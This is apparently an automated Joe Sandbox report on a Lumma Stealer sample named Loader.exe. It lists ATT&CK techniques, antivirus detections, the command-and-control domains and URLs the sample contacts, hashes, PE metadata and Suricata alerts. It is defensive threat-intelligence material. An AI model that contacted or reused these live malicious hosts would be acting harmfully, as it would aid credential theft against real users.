Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	41 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	22 System Information Discovery	SMB/Windows Admin Shares	2 Clipboard Data	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Loader.exe	53%	ReversingLabs	ByteCode-MSIL.Spyware.Lummastealer
Loader.exe	100%	Avira	HEUR/AGEN.1352702

Source	Detection	Scanner	Label
http://upx.sf.net	0%	URL Reputation	safe
evoliutwoqm.shop	0%	Avira URL Cloud	safe
stamppreewntnq.shop	100%	Avira URL Cloud	phishing
froytnewqowv.shop	100%	Avira URL Cloud	phishing
https://froytnewqowv.shop/apiMf	100%	Avira URL Cloud	phishing
https://froytnewqowv.shop/	100%	Avira URL Cloud	phishing
https://froytnewqowv.shop:443/api	100%	Avira URL Cloud	phishing
https://froytnewqowv.shop/b.y	100%	Avira URL Cloud	phishing
https://froytnewqowv.shop/5	100%	Avira URL Cloud	phishing
https://froytnewqowv.shop/api	100%	Avira URL Cloud	malware
condedqpwqm.shop	100%	Avira URL Cloud	phishing
locatedblsoqp.shop	100%	Avira URL Cloud	phishing
millyscroqwp.shop	100%	Avira URL Cloud	malware
caffegclasiqwp.shop	100%	Avira URL Cloud	malware
traineiwnqo.shop	100%	Avira URL Cloud	malware
stagedchheiqwo.shop	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
froytnewqowv.shop	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://froytnewqowv.shop/api	true	Avira URL Cloud: malware	unknown
froytnewqowv.shop	true	Avira URL Cloud: phishing	unknown
stamppreewntnq.shop	true	Avira URL Cloud: phishing	unknown
condedqpwqm.shop	true	Avira URL Cloud: phishing	unknown
evoliutwoqm.shop	true	Avira URL Cloud: safe	unknown
locatedblsoqp.shop	true	Avira URL Cloud: phishing	unknown
caffegclasiqwp.shop	true	Avira URL Cloud: malware	unknown
millyscroqwp.shop	true	Avira URL Cloud: malware	unknown
stagedchheiqwo.shop	true	Avira URL Cloud: phishing	unknown
traineiwnqo.shop	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://froytnewqowv.shop:443/api	RegAsm.exe, 00000002.00000002.2208570206.0000000001066000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://froytnewqowv.shop/5	RegAsm.exe, 00000002.00000002.2208570206.000000000104F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://froytnewqowv.shop/	RegAsm.exe, 00000002.00000002.2208570206.0000000001042000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2208570206.000000000104F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://froytnewqowv.shop/b.y	RegAsm.exe, 00000002.00000002.2208570206.000000000100A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://froytnewqowv.shop/apiMf	RegAsm.exe, 00000002.00000002.2208570206.000000000102F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://upx.sf.net	Amcache.hve.6.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	froytnewqowv.shop	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501451
Start date and time:	2024-08-29 23:42:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Loader.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/6@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 16 Number of non-executed functions: 41
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Loader.exe

Simulations

Behavior and APIs

Time	Type	Description
17:43:00	API Interceptor	1x Sleep call for process: RegAsm.exe modified
17:43:15	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	Izvod racuna u prilogu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.coinwab.com/kqqj/
	file.exe	Get hash	malicious	LummaC	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	Document_pdf.exe	Get hash	malicious	FormBook	Browse	www.x0x9x8x8x7x6.shop/dscg/
	QUOTATION_AUGQTRA071244#U00b7PDF.scr	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/zbi9vNYx/download
	z1209627360293827.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.coinwab.com/kqqj/
	file.exe	Get hash	malicious	LummaC	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	Rudvfa0Z17.exe	Get hash	malicious	Nitol	Browse	web.ad87h92j.com/4/t.bmp
	nOyswc9ly2.dll	Get hash	malicious	Unknown	Browse	web.ad87h92j.com/4/t.bmp
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/0U9QqTZ6/download
	QUOTATION_AUGQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/e0pM9Trc/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
froytnewqowv.shop	NewInst.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	1YC268KfwD.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	PqyFc2vziL.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	cJX8BV8LYG.exe	Get hash	malicious	Azorult	Browse	172.67.128.117
	If doesnt work open it.exe	Get hash	malicious	LummaC	Browse	172.67.177.157
	https://uaj.sa/api/aHR0cHM6Ly9nb29nbGUuY29t&sig=ZDUxNjU0ZTllNzZkYTAxNWE4OTNkZTAyM2ZkZDA1MGViMGIzY2UyOTU1MzY1NGMyNjFlOTExM2ZiMzA5MzdmMg&exp=MTcyNDIzOTUzMQ	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	NewInst.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	4QihT6CwD8.exe	Get hash	malicious	Azorult	Browse	104.21.2.6
	https://5kirp.mellifluous5.com/5kiRp/	Get hash	malicious	HTMLPhisher	Browse	172.66.0.227
	https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1	Get hash	malicious	Unknown	Browse	104.17.246.203

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	If doesnt work open it.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	NewInst.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	rBslc_Pymt-Hs.exe	Get hash	malicious	Remcos, DBatLoader	Browse	188.114.97.3
	Izvod racuna u prilogu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	188.114.97.3
	Z66MsXpleT.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_5c39e2f0624fb3ace2547e2d794ca76a89c913_e446d4ea_0d59fd07-587a-4f33-8e7e-2f122e6be1a3\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1365232912533354
Encrypted:	false
SSDEEP:	192:UaPXNIeFy/8+j00BU/AjezEKZ4d1UzuiFjZ24IO8Z:bXc8+jvBU/AjeUdSzuiFjY4IO8Z
MD5:	923ED44D15C3AD3603274E3A83A7C928
SHA1:	79EED8A5BA2C1A096EA4B41DA1B48BA3BF987EE5
SHA-256:	850C9ED8DA76D68C0D0D19FE5F4482168442D73D7C59D496F1A05BC07886EBEF
SHA-512:	812AD952AAE553F0B9C1A85DDCA7F13EC58044598D4C5C7AAC51E0C0B7FA385128B7DCBE437941CC2FD4FBECFAF1EF3252FB89E2CD928B6C00A36DBB904DC3E4
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.4.1.3.8.1.6.7.4.2.8.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.4.1.3.8.2.1.1.1.7.7.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.5.9.f.d.0.7.-.5.8.7.a.-.4.f.3.3.-.8.e.7.e.-.2.f.1.2.2.e.6.b.e.1.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.1.4.c.7.1.7.-.3.a.d.0.-.4.4.e.1.-.a.7.7.8.-.f.a.a.f.e.1.7.5.1.4.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.d.4.-.0.0.0.1.-.0.0.1.4.-.b.b.4.b.-.9.e.6.a.5.c.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F48.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Aug 29 21:43:01 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	106956
Entropy (8bit):	2.0819799847560376
Encrypted:	false
SSDEEP:	384:FkwWJM5Hnlo4hchAhz6Rb/L7R/gC5s2z7fbwdpnNf6Kln0746adiYIGB0ci9J88:Fkw5nTKvR/Rz7fbw9ccYH
MD5:	4AA791DEF5F7BDA2B63B8E9E9F029BC6
SHA1:	973224C527A9D2FA073D899CB8EDB5D4414CA389
SHA-256:	D6254E8A42223E26B9EF14716EC0A3E8727789149A013A2C9FB17B6A5DF6CA15
SHA-512:	D485C76D3B603C73FD9D92E5745F2FB4CCF544F4A878B674A01C491DF04DD495CC31BE87CBE67A1DD4563D012F4AE6DBAC7096E03A9A114DCEA8639178C4C120
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......e..f........................H...........<....$...........J..........`.......8...........T...........XD..t]...........%...........'..............................................................................eJ.......'......GenuineIntel............T...........c..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3062.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6290
Entropy (8bit):	3.722390522019953
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbB/6wYlQE/emI5aM4UA89bAnsf+rwIRAm:R6l7wVeJB/6wYlIprA89bAnsfL0Am
MD5:	8A9C06F04942863CD17E4EBB9E43D79E
SHA1:	B2CC9AC8B3414ABD767DBC2330BDF23E07E011F2
SHA-256:	188D43C2E7E6F94D0A13B30013E052A557766152A333C9075234B55DBD816AB6
SHA-512:	9E26805F2B0D7D613271A0A2BA438AEE1CC85CB6439446A328C9A97B6B4165C3A989F1DB88622244BD3242A93BE0BEAFD47C655E4E8D00EE80D5C07B9AB7EC1E
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3083.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4628
Entropy (8bit):	4.448096440182059
Encrypted:	false
SSDEEP:	48:cvIwWl8zsbJg77aI9UnWpW8VYXPYm8M4JfuMsi6FD+q8otFM75QgLuOLuqrd:uIjf1I7eW7V6SJfuvNvtW5Bukuqrd
MD5:	6B7F54A0F806CD34902034D2EC501A6F
SHA1:	D6635D8F4014D34CC3ABCF77202D60BDB7E9DDB9
SHA-256:	9F6DF9A5C3D13DD53D41D63BBC323CBBC1BD77118A56F2F43478AEB9D57A6536
SHA-512:	65F474A38EDF41BBF676E467D35CBE69D26A35E53FD2D06A65F263AB419F67B8FB491C340A9F63E54EED34E3DFB8D3516B1BE7D4C8A6E85BE6FB4D6C090D9E7C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477405" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Loader.exe.log

Download File

Process:	C:\Users\user\Desktop\Loader.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.422365735348833
Encrypted:	false
SSDEEP:	6144:ISvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNk0uhiTw:TvloTyW+EZMM6DFye03w
MD5:	CCD89C469FA0AD720F4FF714E13A7349
SHA1:	4480E6900BD620B3AF8B32E4000780637C590601
SHA-256:	0E861CC1442947E67D826FB17594C58B6BFD81B6D19E414DBD22A4289C740225
SHA-512:	56200F91CF0455521FA21CFEA3288F66B85EF6A6F16845A15CBE8FF07DEC3B453522CACC04F113EB36980B34B370526162C335DCFBD7DCCED077CBB879ED828E
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..k\.................................................................................................................................................................................................................................................................................................................................................._........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.987001082413136
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Loader.exe
File size:	318'464 bytes
MD5:	c7acff9e420db036ab543e95341b8c8b
SHA1:	de57cdf8ddcf91a4dcd617a7e7690dd1127b6a5e
SHA256:	dc644e8bfff8121042290307780d3b756f81beae58b452aada89033009883113
SHA512:	c3ea3475ce5d372b97d6489f6455e9ad202f99835841cbca8b7a39f79ad78a15fb3b58de22ac6e190f02203a3008dd895ae139a1fac3560801f1708fc704dc55
SSDEEP:	6144:LFQf6LuNVHMKDrLB0QyFsN0gCuR539QRdeZifOKTROQ4rW7O3hDmeJ5qnOg3:RQwuNVPrLBPyFsGzI5tilROni7O3hCe8
TLSH:	736423C1B3E86910CFE8EDB494711649B1C6CD8DCCA514E226241E237172FA5EEF4EAD
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...vK.f............................^.... ........@.. .......................@............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x44f25e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66D04B76 [Thu Aug 29 10:20:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4f208	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x50000	0x242	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x52000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x4f0d0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4d264	0x4d400	27e04c8f24197a05d3dadb3bef2fd0d2	False	0.9920547633495146	data	7.994081518610872	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x50000	0x242	0x400	0b029f66d66c489e00f900d5feaf7e07	False	0.3017578125	data	3.5160679793070893	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x52000	0xc	0x200	1effe9300242ab389d4b05283ba0b50a	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x50058	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T23:43:00.286382+0200	TCP	2055488	ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop)	1	49704	443	192.168.2.5	188.114.97.3
2024-08-29T23:43:01.050251+0200	TCP	2055488	ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop)	1	49705	443	192.168.2.5	188.114.97.3
2024-08-29T23:43:01.536679+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49705	443	192.168.2.5	188.114.97.3
